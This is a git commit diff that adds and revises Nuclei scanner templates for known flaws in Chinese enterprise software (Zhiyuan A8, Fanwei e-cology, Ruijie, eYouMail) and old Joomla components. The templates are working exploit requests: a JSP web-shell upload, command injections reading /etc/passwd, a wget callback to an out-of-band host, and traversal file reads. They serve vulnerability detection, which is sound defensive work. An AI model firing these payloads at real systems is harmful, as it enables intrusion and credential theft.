Added update 9.0.7
Muhammad Daffa
parent
4faf4dc1d6
commit
594182b8a1
|
|
@ -0,0 +1,13 @@
|
|||
id: 74cms-workflow
|
||||
|
||||
info:
|
||||
name: 74cms Security Checks
|
||||
author: daffainfo
|
||||
description: A simple workflow that runs all 74cms related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/fingerprinthub-web-fingerprints.yaml
|
||||
matchers:
|
||||
- name: 74cms
|
||||
subtemplates:
|
||||
- tags: 74cms
|
||||
|
|
@ -0,0 +1,54 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
|
||||
reference:
|
||||
- https://www.cxyzjd.com/article/guangying177/110177339
|
||||
- https://github.com/sectestt/CNVD-2019-19299
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: zhiyuan,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /seeyon/htmlofficeservlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
||||
OPTION=S3WYOSWLBSGr
|
||||
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
||||
= WUghPB3szB3Xwg66 the CREATEDATE
|
||||
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
||||
originalFileId = wV66
|
||||
originalCreateDate = wUghPB3szB3Xwg66
|
||||
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
||||
needReadFile = yRWZdAS6
|
||||
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
||||
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
||||
|
||||
- |
|
||||
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_1, "htmoffice operate")'
|
||||
- 'contains(body_2, "Windows IP")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
id: CNVD-2019-32204
|
||||
|
||||
info:
|
||||
name: Fanwei e-cology <=9.0 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
|
||||
reference:
|
||||
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: fanwei,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
||||
|
|
@ -0,0 +1,37 @@
|
|||
id: CNVD-2021-01931
|
||||
|
||||
info:
|
||||
name: Ruoyi Management System - Local File Inclusion
|
||||
author: daffainfo,ritikchaddha
|
||||
severity: high
|
||||
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
|
||||
reference:
|
||||
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
|
||||
tags: ruoyi,lfi,cnvd,cnvd2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 06/03/2022
|
||||
|
|
@ -0,0 +1,32 @@
|
|||
id: CNVD-2021-09650
|
||||
|
||||
info:
|
||||
name: Ruijie EWEB Gateway Platform - Remote Command Injection
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
||||
reference:
|
||||
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: ruijie,cnvd,cnvd2021,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
id: CNVD-2021-14536
|
||||
|
||||
info:
|
||||
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
||||
reference:
|
||||
- https://www.adminxe.com/2163.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: title="RG-UAC登录页面"
|
||||
tags: ruijie,cnvd,cnvd2021,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/get_dkey.php?user=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"pre_define"'
|
||||
- '"auth_method"'
|
||||
- '"name"'
|
||||
- '"password"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|
||||
|
||||
# Enhanced by mp on 2022/03/28
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
id: CNVD-2021-15824
|
||||
|
||||
info:
|
||||
name: EmpireCMS DOM Cross Site-Scripting
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/empirecms/
|
||||
- https://www.bilibili.com/read/cv10441910
|
||||
- https://vul.wangan.com/a/CNVD-2021-15824
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
tags: empirecms,cnvd,cnvd2021,xss,domxss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'if(Request("url")!=0)'
|
||||
- 'href=\""+Request("url")+"\"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/23
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
id: CNVD-2021-26422
|
||||
|
||||
info:
|
||||
name: eYouMail - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: eYouMail is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: eyoumail,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
||||
|
|
@ -0,0 +1,44 @@
|
|||
id: CNVD-2021-28277
|
||||
|
||||
info:
|
||||
name: Landray-OA Arbitrary - Arbitrary File Retrieval
|
||||
author: pikpikcu,daffainfo
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.aisoutu.com/a/1432457
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
metadata:
|
||||
fofa-query: app="Landray OA system"
|
||||
tags: landray,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///etc/passwd"}}
|
||||
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: CNVD-2022-03672
|
||||
|
||||
info:
|
||||
name: Sunflower Simple and Personal - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://www.1024sou.com/article/741374.html
|
||||
- https://copyfuture.com/blogs-details/202202192249158884
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sunflower,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/rpc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=verify-haras
|
||||
- |
|
||||
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: CID={{cid}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '"verify_string":"(.*)"'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1==200"
|
||||
- "status_code_2==200"
|
||||
- "contains(body_1, 'verify_string')"
|
||||
- "contains(body_2, 'Windows IP')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
||||
|
|
@ -1,13 +1,16 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
|
||||
classification:
|
||||
cve-id: CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +23,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
|
||||
- http://securityreason.com/securityalert/4464
|
||||
classification:
|
||||
cve-id: CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
|
||||
classification:
|
||||
cve-id: CVE-2008-4764
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
- http://secunia.com/advisories/32377
|
||||
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
|
||||
classification:
|
||||
cve-id: CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -4,10 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
- http://secunia.com/advisories/32367
|
||||
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
- http://secunia.com/advisories/32523
|
||||
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
|
||||
classification:
|
||||
cve-id: CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
|
||||
- http://www.securityfocus.com/bid/34431
|
||||
classification:
|
||||
cve-id: CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -5,8 +5,14 @@ info:
|
|||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/32954
|
||||
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
|
||||
- http://www.vupen.com/english/advisories/2009/1173
|
||||
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
|
||||
classification:
|
||||
cve-id: CVE-2009-1558
|
||||
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
@ -17,7 +23,7 @@ requests:
|
|||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
|
||||
- http://www.vupen.com/english/advisories/2009/1530
|
||||
classification:
|
||||
cve-id: CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
|
||||
- http://www.securityfocus.com/bid/35378
|
||||
classification:
|
||||
cve-id: CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,8 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
|||
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
||||
classification:
|
||||
cve-id: CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,8 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
|||
|
|
@ -1,13 +1,17 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_album 1.14 - Directory Traversal
|
||||
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
|
||||
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
|
||||
classification:
|
||||
cve-id: CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
||||
|
|
|
|||
|
|
@ -1,14 +1,18 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
- http://www.vupen.com/english/advisories/2009/1494
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
|
||||
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
|
||||
classification:
|
||||
cve-id: CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi,photo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
||||
|
|
|
|||
|
|
@ -1,14 +1,19 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
|
||||
name: Joomla! Portfolio Nexus - Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
description: |
|
||||
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
|
||||
- http://secunia.com/advisories/37760
|
||||
classification:
|
||||
cve-id: CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi,nexus
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
@ -20,8 +25,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
- http://websecurity.com.ua/2628/
|
||||
